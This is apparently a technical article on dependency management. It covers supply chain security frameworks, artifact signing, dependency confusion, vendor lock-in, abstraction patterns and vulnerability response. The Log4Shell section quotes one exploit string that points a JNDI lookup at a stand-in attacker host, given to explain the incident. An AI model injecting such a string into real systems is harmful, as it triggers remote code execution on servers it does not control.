Dependency Review - Deep Water

Every modern software system is a careful balance of code you write and code you don’t. The dependencies you choose - libraries, services, platforms - determine your attack surface, your operational complexity, your legal exposure, and your ability to respond when things break. At this level, dependency management is about supply chain security, vendor negotiation, legal compliance, and architectural decisions that affect your company’s ability to operate.

The incidents that make headlines - Log4Shell, left-pad, SolarWinds - weren’t caused by theoretical vulnerabilities. They were dependency management failures that cascaded through thousands of organizations. Understanding why those incidents happened and how organizations responded teaches you what matters when managing complex dependency graphs.

Supply Chain Security Architecture

Supply chain attacks target the weakest link in software delivery: trust. You trust that the package you install from npm contains what the README says it does. You trust that the Docker base image doesn’t contain malware. You trust that your CI/CD system hasn’t been compromised. Attackers know this.

The SLSA Framework

Supply-chain Levels for Software Artifacts (SLSA, pronounced “salsa”) is a security framework that originated at Google and is now maintained under the OpenSSF. It defines levels of supply chain integrity. Most organizations operate at SLSA 0 (no guarantees) without realizing it.

SLSA Level 1 (Documentation):

  • Build process is fully scripted and automated
  • Provenance documents exist showing how artifacts were built
  • Someone can verify that the binary you’re running was built from specific source code

This sounds basic, but plenty of production systems fail here. Can you prove which commit produced your production deployment? Can you trace a deployed container back to the Dockerfile and base image versions?
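One lightweight way to make that traceability concrete is to stamp build metadata into every artifact at build time. A minimal sketch (the `BuildInfo` shape and function names are illustrative, not a SLSA-defined schema):

```typescript
// Minimal build-info stamp: written at build time, read at incident time.
// The field names here are illustrative, not part of any SLSA spec.
interface BuildInfo {
  gitCommit: string;  // exact commit the artifact was built from
  gitRef: string;     // branch or tag
  builtAt: string;    // ISO timestamp
  builder: string;    // CI system identifier
}

function renderBuildInfo(info: BuildInfo): string {
  return JSON.stringify(info, null, 2);
}

function parseBuildInfo(json: string): BuildInfo {
  const parsed = JSON.parse(json) as BuildInfo;
  if (!parsed.gitCommit || !parsed.builtAt) {
    throw new Error('build-info.json is missing required fields');
  }
  return parsed;
}

// At build time (in CI), call this with values from the environment, e.g.
//   stampBuild(process.env.GITHUB_SHA!, process.env.GITHUB_REF!)
function stampBuild(gitCommit: string, gitRef: string): string {
  return renderBuildInfo({
    gitCommit,
    gitRef,
    builtAt: new Date().toISOString(),
    builder: 'github-actions',
  });
}
```

Ship the resulting `build-info.json` alongside the artifact (or bake it into the container image), and “which commit is running in production?” becomes a file read instead of an archaeology project.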

SLSA Level 2 (Tamper Resistance):

  • Source is tracked in version control and builds run on a hosted build service
  • Provenance is generated by the build service, not user-controlled scripts
  • Tampering during the build process is detectable

GitHub Actions with provenance attestations gets you here. CircleCI and GitLab CI can too. The key is that the build metadata comes from the platform, not from scripts developers can modify.

SLSA Level 3 (Hardened Builds):

  • Source and build platform meet specific security standards
  • Provenance is non-falsifiable (cryptographically signed)
  • Builds are isolated from one another

Google’s internal infrastructure operates at SLSA 3. Most companies will struggle to achieve this without dedicated security engineering.

SLSA Level 4 (Maximum Security):

  • Two-person review required
  • Hermetic, reproducible builds
  • Dependencies are recursively audited

This is nation-state level security. Unless you’re building critical infrastructure or high-value targets, SLSA 3 is the realistic maximum.

For most organizations, getting to SLSA 2 prevents the majority of supply chain attacks. The jump from 0 to 2 is achievable with existing tools:

# .github/workflows/build.yml
name: Build with Provenance
on: [push]

permissions:
  contents: read
  packages: write
  id-token: write  # Required for provenance

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - uses: actions/setup-node@v4
      - run: npm ci
      - run: npm run build

      # Generate provenance attestation
      - uses: actions/attest-build-provenance@v1
        with:
          subject-path: 'dist/**'

This creates cryptographically signed provenance showing what source code and build process created your artifacts. Downstream consumers can verify the attestation before using your package.

Sigstore and Artifact Signing

Sigstore is an open source project that makes signing and verifying software artifacts as easy as installing a package. It includes:

  • Cosign: Sign and verify container images and other artifacts
  • Fulcio: Certificate authority for code signing (no need to manage signing keys)
  • Rekor: Transparency log for signatures (a public record of what was signed, when)

Here’s why this matters: traditionally, code signing required managing private keys. Keys get leaked, stolen, or lost. Developers forget to rotate them. They get committed to git repositories. It’s a mess.

Sigstore uses short-lived certificates tied to your OpenID Connect identity (GitHub, Google, Microsoft). Sign an artifact, the certificate expires after 10 minutes, and the signature is recorded in a public transparency log. No keys to manage, no secrets to leak.

Signing a container image:

# Sign with GitHub OIDC
cosign sign --yes ghcr.io/yourorg/yourapp:v1.2.3

# Verify the signature
cosign verify ghcr.io/yourorg/yourapp:v1.2.3 \
  --certificate-identity-regexp="https://github.com/yourorg/.*" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com"

Kubernetes can enforce signature verification:

# Verify images before deployment
apiVersion: v1
kind: Pod
metadata:
  name: app
spec:
  containers:
    - name: app
      image: ghcr.io/yourorg/yourapp:v1.2.3
  # An admission policy controller (e.g. Sigstore policy-controller) rejects unsigned images

Organizations adopting this can prevent the class of attacks where compromised CI/CD systems push malicious images. If the signature doesn’t verify against your organization’s identity, the deployment fails.

The practical implementation depends on your tolerance for complexity. Signing your published packages? Straightforward. Requiring signature verification across your entire dependency chain? That’s a multi-year effort requiring ecosystem cooperation.

Dependency Confusion and Typosquatting

Dependency confusion attacks exploit how package managers resolve names. You have an internal package called @yourcompany/authentication. An attacker publishes a public package with the same name and a higher version number. Your build system installs the malicious public package instead of your internal one.

This happened to major companies. Microsoft, Apple, PayPal, Netflix - all vulnerable before they patched their build systems. The attack worked because package managers defaulted to public registries even when private packages existed.

Prevention mechanisms:

  1. Scope enforcement: Configure package managers to only fetch scoped packages from private registries.
# .npmrc
@yourcompany:registry=https://npm.yourcompany.com/
//npm.yourcompany.com/:_authToken=${NPM_TOKEN}
  2. Allowlisting: Explicitly define which registries are allowed for which scopes.
# .yarnrc.yml
npmScopes:
  yourcompany:
    npmRegistryServer: "https://npm.yourcompany.com"
    npmAlwaysAuth: true
  3. Registry mirroring: Run a proxy registry that only serves approved packages.

Tools like Sonatype Nexus, JFrog Artifactory, or Verdaccio act as intermediaries. Developers install from your registry, which proxies to npm/PyPI/Maven Central after applying your security policies.

  4. Package name squatting: For internal package names you might use publicly, register placeholder packages on public registries. They don’t need to contain real code - just prevent attackers from claiming the name.

Typosquatting is similar but targets typos. The attacker registers reqeusts (a common typo of requests), hoping developers mistype the package name. Prevention is harder because you can’t predict all typos, but:

  • Use dependency lock files (package-lock.json, Pipfile.lock) so typos during updates don’t propagate
  • Enable installation approval flows for new dependencies
  • Run automated scans looking for suspicious new dependencies (packages installed once, never updated)
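One of those automated scans can be sketched with nothing more than edit distance: flag any dependency whose name is suspiciously close to a well-known package. The popular-package list below is a tiny illustrative sample, and the threshold of 2 is an assumption (plain Levenshtein counts a transposition like reqeusts/requests as two edits):

```typescript
// Sketch: flag dependencies whose names are within 2 edits of a
// well-known package -- a common typosquatting pattern.
// POPULAR is an illustrative sample, not a real curated list.
const POPULAR = ['requests', 'express', 'lodash', 'react'];

// Standard Levenshtein distance via dynamic programming.
function editDistance(a: string, b: string): number {
  const dp: number[][] = Array.from({ length: a.length + 1 }, (_, i) =>
    Array.from({ length: b.length + 1 }, (_, j) => (i === 0 ? j : j === 0 ? i : 0))
  );
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      dp[i][j] = Math.min(
        dp[i - 1][j] + 1,                                    // deletion
        dp[i][j - 1] + 1,                                    // insertion
        dp[i - 1][j - 1] + (a[i - 1] === b[j - 1] ? 0 : 1)   // substitution
      );
    }
  }
  return dp[a.length][b.length];
}

// Suspicious: close to a popular package but not actually it.
function findSuspects(deps: string[]): string[] {
  return deps.filter((dep) =>
    POPULAR.some((pkg) => pkg !== dep && editDistance(dep, pkg) <= 2)
  );
}
```

A low threshold keeps false positives down but misses creative misspellings; a real scanner would combine this with signals like package age and download counts.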

Vendor Takeover and Ownership Changes

A maintainer’s npm account gets compromised. A popular package gets sold to a new owner who introduces analytics tracking. A company acquires a library and changes the license. The risk isn’t theoretical.

Event-stream incident (2018): A popular npm package (event-stream, 2 million downloads/week) transferred ownership to a new maintainer who published a version containing malicious code targeting cryptocurrency wallets. The malicious version was available for two months before discovery.

ua-parser-js incident (2021): Three malicious versions of ua-parser-js (8 million downloads/week) were published after the maintainer’s account was compromised. The malicious code attempted to install cryptominers and credential stealers.

Defense strategies:

  1. Lock files and hash verification: package-lock.json and similar files record exact versions and integrity hashes. If the package contents change, installation fails.
{
  "packages": {
    "node_modules/lodash": {
      "version": "4.17.21",
      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz",
      "integrity": "sha512-v2kDEe57lecTulaDIuNTPy3Ry4gLGJ6Z1O3vE1krgXZNrsQ+LFTGHVxVjcXPs17LhbZVGedAJv8XZ1tvj5FvSg=="
    }
  }
}
  2. Automated security monitoring: Tools like Socket.dev analyze package updates for suspicious behavior:

    • New network connections in patch versions
    • Obfuscated code in updates
    • Installation scripts that weren’t there before
    • Dependency additions in minor versions
  3. Pinning critical dependencies: Use exact versions for security-critical packages. Accept the maintenance burden in exchange for control over when updates happen.

{
  "dependencies": {
    "express": "4.18.2",      // Exact version
    "helmet": "~7.1.0",       // Patch updates only
    "lodash": "^4.17.21"      // Minor + patch updates
  }
}

The tradeoff is that you’re responsible for monitoring and updating. Dependabot helps, but you’re choosing manual updates over automatic security patches.

  4. Software Bill of Materials (SBOM): Generate a complete inventory of components, versions, and hashes. This is your evidence trail when investigating incidents.
# Generate SBOM in SPDX format
syft packages dir:. -o spdx-json > sbom.json

# Or CycloneDX format
syft packages dir:. -o cyclonedx-json > sbom-cyclonedx.json

SBOMs are becoming mandatory for government contractors (US Executive Order 14028) and will likely spread to regulated industries. Even without regulatory requirements, you want this data when investigating supply chain incidents.
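The payoff comes when you can actually query that data. A minimal sketch of an incident-response lookup over an SPDX-style SBOM (assuming the SPDX JSON shape `{ packages: [{ name, versionInfo }] }`, as produced by tools like syft):

```typescript
// Sketch: index an SPDX-style SBOM so you can answer "do we ship
// package X, and at what versions?" during an incident.
// Assumes the SPDX JSON shape: { packages: [{ name, versionInfo }] }.
interface SpdxPackage { name: string; versionInfo?: string; }
interface SpdxDocument { packages?: SpdxPackage[]; }

function indexSbom(doc: SpdxDocument): Map<string, string[]> {
  const index = new Map<string, string[]>();
  for (const pkg of doc.packages ?? []) {
    const versions = index.get(pkg.name) ?? [];
    versions.push(pkg.versionInfo ?? 'unknown');
    index.set(pkg.name, versions);
  }
  return index;
}

// Incident-response query: is this package anywhere in the build?
function shipsPackage(index: Map<string, string[]>, name: string): boolean {
  return index.has(name);
}
```

Feed it `JSON.parse(fs.readFileSync('sbom.json', 'utf8'))` and a Log4Shell-style “are we affected?” question takes seconds per service instead of days.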

Vendor Lock-In: Strategic Analysis

Vendor lock-in isn’t inherently bad. AWS lock-in might be acceptable if you’re getting significant value from AWS-specific services. The problem is accidental lock-in - when you’re deeply coupled to a vendor without having consciously accepted the trade-off.

Multi-Cloud Abstraction Strategies

Multi-cloud is expensive and complex. Organizations pursuing it usually have one of these motivations:

  1. Regulatory requirements: Data residency laws force geographic distribution
  2. Risk mitigation: Avoiding single vendor dependency for critical systems
  3. Cost optimization: Using cheapest provider for each workload
  4. Merger integration: Combining organizations with different cloud choices

If none of those apply, multi-cloud probably isn’t worth the complexity. That said, you can design for portability without running multiple clouds in production.

Abstraction layer patterns:

Storage abstraction example:

// Define interface independent of provider
interface ObjectStorage {
  upload(key: string, data: Buffer, metadata?: Record<string, string>): Promise<void>;
  download(key: string): Promise<Buffer>;
  delete(key: string): Promise<void>;
  listObjects(prefix: string): Promise<string[]>;
}

// AWS implementation
class S3Storage implements ObjectStorage {
  constructor(private s3Client: S3Client, private bucket: string) {}

  async upload(key: string, data: Buffer, metadata?: Record<string, string>) {
    await this.s3Client.send(new PutObjectCommand({
      Bucket: this.bucket,
      Key: key,
      Body: data,
      Metadata: metadata
    }));
  }

  // ... other methods
}

// GCP implementation
class GCSStorage implements ObjectStorage {
  constructor(private storage: Storage, private bucket: string) {}

  async upload(key: string, data: Buffer, metadata?: Record<string, string>) {
    const file = this.storage.bucket(this.bucket).file(key);
    await file.save(data, { metadata });
  }

  // ... other methods
}

// Application code uses the interface
class DocumentService {
  constructor(private storage: ObjectStorage) {}

  async saveDocument(id: string, content: Buffer) {
    await this.storage.upload(`documents/${id}`, content);
  }
}

This looks good in slides. Reality is messier:

  • S3 has features GCS doesn’t (object locking, Glacier storage classes)
  • GCS has features S3 doesn’t (uniform bucket-level access)
  • Performance characteristics differ (latency, throughput, consistency guarantees)
  • Pricing models differ (per-request costs, egress charges)

Your abstraction either hides useful features (limiting what you can do) or leaks implementation details (defeating the purpose). There’s no perfect answer. The question is what level of portability justifies the abstraction cost.
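One middle ground is an explicit escape hatch: the portable interface covers commodity operations, and code that genuinely needs a provider feature probes for it as a named capability instead of the abstraction silently leaking. A sketch under assumed names (`ObjectLocking`, `supportsLocking`, and the fake storage class are all illustrative):

```typescript
// Sketch: a capability escape hatch on top of a portable interface.
// Commodity callers use ObjectStorage; callers that need a provider
// feature (e.g. S3 object locking) probe for it explicitly.
interface ObjectStorage {
  upload(key: string, data: Uint8Array): Promise<void>;
}

// Optional, provider-specific capability.
interface ObjectLocking {
  lockObject(key: string, retainDays: number): Promise<void>;
}

function supportsLocking(storage: ObjectStorage): storage is ObjectStorage & ObjectLocking {
  return typeof (storage as Partial<ObjectLocking>).lockObject === 'function';
}

// In-memory stand-in that happens to support locking.
class FakeLockingStorage implements ObjectStorage, ObjectLocking {
  public locked: string[] = [];
  async upload(_key: string, _data: Uint8Array): Promise<void> {}
  async lockObject(key: string, _retainDays: number): Promise<void> {
    this.locked.push(key);
  }
}

// Call sites stay honest: use locking when the backing store provides
// it, and degrade explicitly (not silently) when it doesn't.
async function archive(storage: ObjectStorage, key: string, data: Uint8Array): Promise<boolean> {
  await storage.upload(key, data);
  if (supportsLocking(storage)) {
    await storage.lockObject(key, 2555); // ~7-year retention
    return true;
  }
  return false; // caller decides how to handle missing immutability
}
```

The leak still exists, but it is visible at every call site that depends on it, which makes the eventual migration cost easy to grep for.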

When abstraction makes sense:

  • You’re using commodity features (basic object storage, key-value cache, relational database)
  • The performance differences don’t matter for your use case
  • You need to support multiple providers for regulatory or business reasons
  • You’re building a product that customers deploy on their chosen infrastructure

When to accept vendor lock-in:

  • You’re using provider-specific features that differentiate your product (AWS Lambda layers, GCP BigQuery, Azure Cognitive Services)
  • The provider’s managed service is significantly better than open source alternatives
  • Your team’s expertise is concentrated in one ecosystem
  • The business risk of vendor dependency is lower than the technical risk of managing complexity

Database Portability Strategies

Database choice is one of the hardest to reverse. Your schema, queries, performance characteristics, and operational tooling all couple to the database.

Portability spectrum (most to least portable):

  1. PostgreSQL/MySQL: Open source, widely supported, mature ecosystem. Can run on any cloud, on-premises, or managed services. Migration between providers (AWS RDS → GCP Cloud SQL → self-hosted) is mostly operational, not architectural.

  2. Open source databases with vendor extensions: PostgreSQL with AWS Aurora features, MySQL with Google Cloud SQL enhancements. Mostly portable but you lose features when migrating.

  3. Proprietary databases with standard interfaces: SQL Server, Oracle. Expensive to migrate but at least use SQL standards. Schema portability exists but vendor-specific features (T-SQL, PL/SQL) create friction.

  4. Cloud-native databases: DynamoDB, Firestore, CosmosDB. Deeply integrated with their platforms. Migration requires application rewrites, not just operational changes.

Making the decision:

If you’re building a startup, PostgreSQL gives you an exit strategy. You can start on Heroku Postgres, move to AWS RDS, migrate to self-hosted if costs get prohibitive. The lock-in is minimal.

If you’re building at scale where DynamoDB’s single-digit millisecond latency matters, the performance benefit might justify the lock-in. Just acknowledge that you’re accepting it.

Repository pattern for database abstraction:

// Domain model (independent of database)
interface UserRepository {
  findById(id: string): Promise<User | null>;
  findByEmail(email: string): Promise<User | null>;
  save(user: User): Promise<void>;
  delete(id: string): Promise<void>;
}

// PostgreSQL implementation
class PostgresUserRepository implements UserRepository {
  constructor(private db: Pool) {}

  async findById(id: string): Promise<User | null> {
    const result = await this.db.query(
      'SELECT * FROM users WHERE id = $1',
      [id]
    );
    return result.rows[0] ? this.mapToUser(result.rows[0]) : null;
  }

  // ... other methods
}

// DynamoDB implementation
class DynamoDBUserRepository implements UserRepository {
  constructor(private dynamodb: DynamoDBClient, private table: string) {}

  async findById(id: string): Promise<User | null> {
    const result = await this.dynamodb.send(new GetItemCommand({
      TableName: this.table,
      Key: { id: { S: id } }
    }));
    return result.Item ? this.mapToUser(result.Item) : null;
  }

  // ... other methods
}

This works for simple CRUD operations. It breaks down when you need:

  • Complex queries (joins, aggregations)
  • Transactions across multiple entities
  • Database-specific optimizations (PostgreSQL window functions, DynamoDB composite indexes)

The abstraction is helpful for isolating database dependencies, but it won’t make migration trivial.

Platform-Specific Features: Use Them or Avoid Them?

Every cloud platform has features that make development easier but increase lock-in. The question is whether the productivity gain justifies the coupling.

Examples of high-lock-in features:

  • AWS Lambda layers, Step Functions, EventBridge
  • GCP Cloud Run, Workflows, Pub/Sub
  • Azure Functions, Logic Apps, Service Bus

Evaluating the trade-off:

Ask: “What would migration cost if we needed to leave this platform?”

For AWS Lambda:

  • Functions → Containers: Straightforward, mostly refactoring
  • Step Functions → Temporal/Cadence: Significant rewrite, different programming model
  • EventBridge → RabbitMQ/Kafka: Architectural changes, event routing logic moves to application

If Step Functions saves you from building a state machine orchestration system, the lock-in might be worth it. You’re trading optionality for velocity.

If you’re in a regulated industry where vendor independence is a compliance requirement, you can’t make that trade.

Escape hatch strategy:

Design systems where the core business logic is portable and the platform-specific code is minimal:

// Core business logic (portable)
class OrderProcessor {
  async processOrder(order: Order): Promise<ProcessingResult> {
    // Business logic independent of where it runs
    const validation = await this.validateOrder(order);
    if (!validation.isValid) {
      return { status: 'rejected', reason: validation.reason };
    }

    const payment = await this.processPayment(order);
    if (!payment.success) {
      return { status: 'failed', reason: payment.error };
    }

    await this.fulfillOrder(order);
    return { status: 'completed' };
  }
}

// AWS Lambda wrapper (platform-specific, minimal)
export const handler: Handler = async (event: SQSEvent) => {
  const processor = new OrderProcessor(/* dependencies */);

  for (const record of event.Records) {
    const order = JSON.parse(record.body);
    await processor.processOrder(order);
  }
};

// GCP Cloud Run wrapper (different platform, same logic)
app.post('/process-order', async (req, res) => {
  const processor = new OrderProcessor(/* dependencies */);
  const result = await processor.processOrder(req.body);
  res.json(result);
});

The business logic is tested and portable. The platform-specific code is a thin adapter. Migration means rewriting the adapters, not the core system.

Dependency Abstraction Patterns

Isolating dependencies through architectural patterns reduces coupling and makes systems easier to modify.

Adapter Pattern for External Services

The adapter pattern wraps third-party services with your own interface. The rest of your code depends on your interface, not the vendor’s API.

Payment processing abstraction:

// Your interface
interface PaymentProcessor {
  createCustomer(email: string, name: string): Promise<Customer>;
  createPaymentMethod(customerId: string, token: string): Promise<PaymentMethod>;
  chargeCustomer(customerId: string, amount: number, currency: string): Promise<Charge>;
}

// Stripe adapter
class StripePaymentProcessor implements PaymentProcessor {
  constructor(private stripe: Stripe) {}

  async createCustomer(email: string, name: string): Promise<Customer> {
    const stripeCustomer = await this.stripe.customers.create({ email, name });
    return {
      id: stripeCustomer.id,
      email: stripeCustomer.email!,
      name: stripeCustomer.name!
    };
  }

  async chargeCustomer(customerId: string, amount: number, currency: string): Promise<Charge> {
    const paymentIntent = await this.stripe.paymentIntents.create({
      customer: customerId,
      amount,
      currency,
      confirm: true
    });

    return {
      id: paymentIntent.id,
      amount: paymentIntent.amount,
      status: this.mapStatus(paymentIntent.status)
    };
  }

  private mapStatus(stripeStatus: string): ChargeStatus {
    // Translate Stripe's status to your domain model
    switch (stripeStatus) {
      case 'succeeded': return 'completed';
      case 'processing': return 'pending';
      case 'requires_payment_method': return 'failed';
      default: return 'unknown';
    }
  }
}

// PayPal adapter (different API, same interface)
class PayPalPaymentProcessor implements PaymentProcessor {
  // Implementation using PayPal SDK
}

Benefits:

  • Business logic doesn’t import Stripe or PayPal SDKs
  • Switching providers means writing a new adapter, not changing business logic
  • Testing is easier (mock your interface, not Stripe’s)
  • You control the vocabulary (your domain language, not Stripe’s)

Costs:

  • Adapter code to write and maintain
  • Impedance mismatch when provider features don’t map cleanly
  • Performance overhead (usually negligible)

This is worth it for critical dependencies where you want the option to switch or where business logic shouldn’t couple to vendor specifics.

Anti-Corruption Layer

The anti-corruption layer (from Domain-Driven Design) is a sophisticated adapter that protects your domain model from external systems with incompatible models.

Example: integrating with a legacy ERP system that models inventory in a way that doesn’t match your e-commerce domain.

// Your domain model
class Product {
  constructor(
    public id: string,
    public name: string,
    public price: Money,
    public stock: StockLevel
  ) {}

  canFulfillOrder(quantity: number): boolean {
    return this.stock.available >= quantity;
  }
}

// Legacy ERP has a different model
interface ERPInventoryRecord {
  itemCode: string;
  description: string;
  unitPrice: number;
  warehouseQuantities: Array<{
    location: string;
    onHand: number;
    allocated: number;
    onOrder: number;
  }>;
}

// Anti-corruption layer translates between models
class ERPInventoryAdapter {
  constructor(private erpClient: ERPClient) {}

  async getProduct(id: string): Promise<Product> {
    const erpRecord = await this.erpClient.getInventoryRecord(id);

    // Complex translation logic
    const totalAvailable = erpRecord.warehouseQuantities.reduce(
      (sum, wh) => sum + (wh.onHand - wh.allocated),
      0
    );

    return new Product(
      erpRecord.itemCode,
      this.cleanupDescription(erpRecord.description),
      new Money(erpRecord.unitPrice, 'USD'),
      new StockLevel(totalAvailable)
    );
  }

  private cleanupDescription(desc: string): string {
    // ERP descriptions have legacy formatting quirks
    return desc.replace(/\[LEGACY\]/g, '').trim();
  }
}

The anti-corruption layer prevents the legacy system’s modeling decisions from polluting your codebase. Your domain stays clean even when integrating with systems that have different vocabularies, different assumptions, or different quality standards.

Interface Segregation for Dependencies

Don’t depend on entire libraries when you only need a small piece. Define minimal interfaces that capture what you actually use.

// Bad: depending on entire AWS SDK
import { S3Client, PutObjectCommand, GetObjectCommand } from '@aws-sdk/client-s3';

class DocumentStorage {
  constructor(private s3: S3Client, private bucket: string) {}
  // Everything couples to AWS
}

// Better: define what you actually need
interface BlobStorage {
  put(key: string, data: Buffer): Promise<void>;
  get(key: string): Promise<Buffer>;
}

// AWS implementation
class S3BlobStorage implements BlobStorage {
  constructor(private s3: S3Client, private bucket: string) {}

  async put(key: string, data: Buffer): Promise<void> {
    await this.s3.send(new PutObjectCommand({
      Bucket: this.bucket,
      Key: key,
      Body: data
    }));
  }

  async get(key: string): Promise<Buffer> {
    const response = await this.s3.send(new GetObjectCommand({
      Bucket: this.bucket,
      Key: key
    }));
    return Buffer.from(await response.Body!.transformToByteArray());
  }
}

// Application code
class DocumentStorage {
  constructor(private storage: BlobStorage) {}
  // Only couples to minimal interface
}

Testing becomes straightforward:

// Mock implementation for tests
class InMemoryBlobStorage implements BlobStorage {
  private data = new Map<string, Buffer>();

  async put(key: string, data: Buffer): Promise<void> {
    this.data.set(key, data);
  }

  async get(key: string): Promise<Buffer> {
    const data = this.data.get(key);
    if (!data) throw new Error('Not found');
    return data;
  }
}

// Test without AWS
test('document storage saves files', async () => {
  const storage = new DocumentStorage(new InMemoryBlobStorage());
  await storage.save('doc.pdf', Buffer.from('content'));
  // assertions
});

The pattern scales. Define interfaces for email sending, SMS delivery, payment processing, authentication - any external dependency you might want to replace or test without the real service.
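Applied to email sending, the same move looks like this. A minimal sketch (the interface and class names are illustrative, not any particular SDK):

```typescript
// Sketch: a minimal email interface. Application code depends on this,
// not on a provider SDK such as SES or SendGrid.
interface EmailSender {
  send(to: string, subject: string, body: string): Promise<void>;
}

// Test/dev implementation: records messages instead of sending them.
class RecordingEmailSender implements EmailSender {
  public sent: Array<{ to: string; subject: string; body: string }> = [];
  async send(to: string, subject: string, body: string): Promise<void> {
    this.sent.push({ to, subject, body });
  }
}

// Business logic only sees the interface.
class PasswordResetService {
  constructor(private email: EmailSender) {}

  async requestReset(userEmail: string, token: string): Promise<void> {
    await this.email.send(
      userEmail,
      'Password reset',
      `Use this token to reset your password: ${token}`
    );
  }
}
```

The production adapter wrapping the real provider SDK is the only file that imports it; everything else, including every test, works against the two-method interface.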

Vulnerability Management at Scale

Managing vulnerabilities across hundreds of dependencies and multiple services requires systematic processes, not ad-hoc responses.

CVE Lifecycle and Response Planning

When a CVE is published for a dependency you use, you need a decision framework:

Severity assessment:

CVSS scores (0-10) give you a starting point, but you need context:

  • Critical (9.0-10.0): Remote code execution, authentication bypass, data exposure with no user interaction
  • High (7.0-8.9): Privilege escalation, SQL injection, XSS with serious impact
  • Medium (4.0-6.9): Information disclosure, DoS requiring specific conditions
  • Low (0.1-3.9): Minor information leaks, DoS requiring local access

Exploitability factors:

  • Is exploit code publicly available? (Prioritize)
  • Does it require authentication? (Less urgent if authentication is strong)
  • Is the vulnerable code path actually used in your application? (Audit call graphs)
  • Are there mitigating controls? (WAF rules, network segmentation)

Response timeline framework:

Critical + Public Exploit + Unauthenticated:
  - Assess impact: 1 hour
  - Deploy mitigation: 4 hours
  - Full remediation: 24 hours

Critical + No Exploit + Requires Auth:
  - Assess impact: 4 hours
  - Plan remediation: 24 hours
  - Deploy fix: 1 week

High + Public Exploit:
  - Assess impact: 24 hours
  - Deploy mitigation: 1 week
  - Full remediation: 2 weeks

Medium:
  - Assess impact: 1 week
  - Deploy fix: Next sprint

Low:
  - Review quarterly
  - Fix during regular updates

Adjust these based on your risk tolerance and regulatory requirements. Healthcare and finance typically have shorter windows. Internal tools might have longer ones.
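The framework above can be encoded as code so triage decisions stay consistent and auditable. A sketch where the hours mirror the table; the high-without-exploit and low tiers are assumed defaults the framework leaves open:

```typescript
// Sketch: encode the response-timeline framework as a function.
// Hours mirror the framework above; tune for your risk tolerance.
type Severity = 'critical' | 'high' | 'medium' | 'low';

interface Finding {
  severity: Severity;
  publicExploit: boolean;
  requiresAuth: boolean;
}

// Returns the full-remediation deadline in hours.
function remediationDeadlineHours(f: Finding): number {
  if (f.severity === 'critical') {
    // Public, unauthenticated exploit: remediate within 24 hours.
    return f.publicExploit && !f.requiresAuth ? 24 : 7 * 24;
  }
  if (f.severity === 'high') {
    // 30 days without a public exploit is an assumed default.
    return f.publicExploit ? 14 * 24 : 30 * 24;
  }
  if (f.severity === 'medium') return 14 * 24; // "next sprint"
  return 90 * 24; // low: reviewed quarterly
}
```

Having the policy in one function (rather than scattered across runbooks) also gives you something to diff when auditors or regulators ask how your response windows changed over time.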

Patch Management Strategy

Patching dependencies is risk management. You’re balancing the risk of known vulnerabilities against the risk of updates breaking your system.

Automated patch tiers:

Tier 1 - Auto-merge:

  • Patch version updates (1.2.3 → 1.2.4)
  • Low/medium severity fixes
  • Passing CI tests
  • Libraries with good track records

Configuration example with Dependabot:

# .github/dependabot.yml
version: 2
updates:
  - package-ecosystem: "npm"
    directory: "/"
    schedule:
      interval: "daily"
    open-pull-requests-limit: 10

    # Auto-merge patch updates
    versioning-strategy: increase
    labels:
      - "dependencies"
      - "automerge"

    # Group minor updates for review
    groups:
      minor-updates:
        patterns:
          - "*"
        update-types:
          - "minor"

GitHub Actions can auto-merge PRs with specific labels:

name: Auto-merge Dependabot
on: pull_request

jobs:
  automerge:
    runs-on: ubuntu-latest
    if: github.actor == 'dependabot[bot]'
    steps:
      - uses: actions/checkout@v4
      - name: Check if automerge label exists
        id: check-label
        run: |
          if gh pr view ${{ github.event.pull_request.number }} --json labels -q '.labels[].name' | grep -q automerge; then
            echo "automerge=true" >> "$GITHUB_OUTPUT"
          fi
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

      - name: Auto-merge
        if: steps.check-label.outputs.automerge == 'true'
        run: gh pr merge ${{ github.event.pull_request.number }} --auto --squash
        env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}

Tier 2 - Automated testing, manual review:

  • Minor version updates (1.2.3 → 1.3.0)
  • New features or API changes
  • High severity security fixes

CI runs full test suite, security scans, and integration tests. Developers review changelog and approve.

Tier 3 - Manual testing:

  • Major version updates (1.x.x → 2.0.0)
  • Breaking changes
  • Critical dependencies (auth, payment, database)

Requires staging environment testing, rollback plan, and phased rollout.

Zero-Day Response Procedures

Zero-day vulnerabilities (exploits before patches exist) require temporary mitigations while waiting for fixes.

Log4Shell example (December 2021):

The vulnerability: Log4j would evaluate JNDI expressions in log messages, allowing remote code execution. An attacker could trigger it by getting ${jndi:ldap://attacker.com/exploit} logged anywhere.

Timeline and response:

  • Day 0 (CVE published): No patch available. Organizations scrambled to identify Log4j usage.
  • Immediate mitigation: Set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true to disable the vulnerable lookup feature.
  • Day 1: Log4j 2.15.0 released. Organizations began urgent patching.
  • Day 4: 2.15.0 found incomplete. CVE-2021-45046 published.
  • Day 6: Log4j 2.16.0 released with full fix.
  • Day 9: Third vulnerability (CVE-2021-45105) published.
  • Day 11: Log4j 2.17.0 released.

Organizations that responded well had:

  1. Asset inventory: Knew where Log4j was used (direct dependencies, transitive dependencies, embedded in third-party software).
# Find Log4j in Java dependencies
mvn dependency:tree | grep log4j

# Find in container images
syft packages alpine:latest | grep log4j

# Find in running systems
find / -name "log4j-core-*.jar" 2>/dev/null
  2. Quick mitigation deployment: Could push environment variable changes without full redeployment.

  3. Patch testing process: Could validate patches quickly and deploy to production within hours.

  4. Communication plan: Updated customers and stakeholders on status and remediation timeline.

Organizations that struggled:

  • Didn’t know what dependencies they had
  • Couldn’t deploy configuration changes quickly
  • Required lengthy change approval processes
  • Had no emergency patch procedures

Building zero-day response capabilities:

  • Maintain SBOM for all systems (you need to know what you’re running)
  • Practice emergency patch drills (can you patch critical systems in 24 hours?)
  • Have emergency change approval process (not 3-week CAB review)
  • Monitor security mailing lists and vulnerability databases
  • Establish communication templates for customer notification

Security Advisory Monitoring

You can’t respond to vulnerabilities you don’t know about. Monitoring must be automated and comprehensive.

Information sources:

  • GitHub Advisory Database: Covers npm, PyPI, RubyGems, Maven, NuGet
  • NVD (National Vulnerability Database): CVEs across all software
